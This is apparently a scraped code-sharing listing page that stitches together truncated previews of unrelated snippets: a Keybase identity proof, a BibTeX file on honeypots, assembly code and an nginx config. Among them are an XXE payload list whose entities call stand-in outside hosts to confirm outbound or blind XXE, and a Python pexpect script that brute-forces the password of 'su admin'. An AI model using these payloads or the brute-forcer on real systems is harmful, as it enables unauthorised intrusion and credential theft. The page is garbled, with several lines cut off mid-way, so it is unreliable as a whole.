I hereby claim:
- I am whoismath on github.
- I am vrechson (https://keybase.io/vrechson) on keybase.
- I have a public key whose fingerprint is ECC9 E966 EA34 0775 F9CF 6EFD 146E 86D7 FD68 F6DF
To claim this, I am signing this object:
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
I hereby claim:
To claim this, I am signing this object:
%% This BibTeX bibliography file was created using BibDesk. | |
%% http://bibdesk.sourceforge.net/ | |
%% Saved with string encoding Unicode (UTF-8) | |
%% Honeypots | |
@inproceedings{kuwatly2004dynamic, | |
title={A dynamic honeypot design for intrusion detection}, |
INCLUDE Irvine32.inc | |
POINT STRUCT | |
X BYTE 0 | |
Y BYTE 0 | |
POINT ENDS | |
.data |
import pexpect | |
import multiprocessing | |
import sys | |
def trypass(password): | |
COMMAND_PROMPT = '[$#] ' | |
WRONGPASS1 = 'Sorry.' | |
WRONGPASS2 = 'su: incorrect password' | |
child = pexpect.spawn('/bin/su admin') |
#user nobody; | |
worker_processes 2; | |
#error_log logs/error.log; | |
#error_log logs/error.log notice; | |
#error_log logs/error.log info; | |
error_log /dev/null; | |
pid logs/nginx.pid; |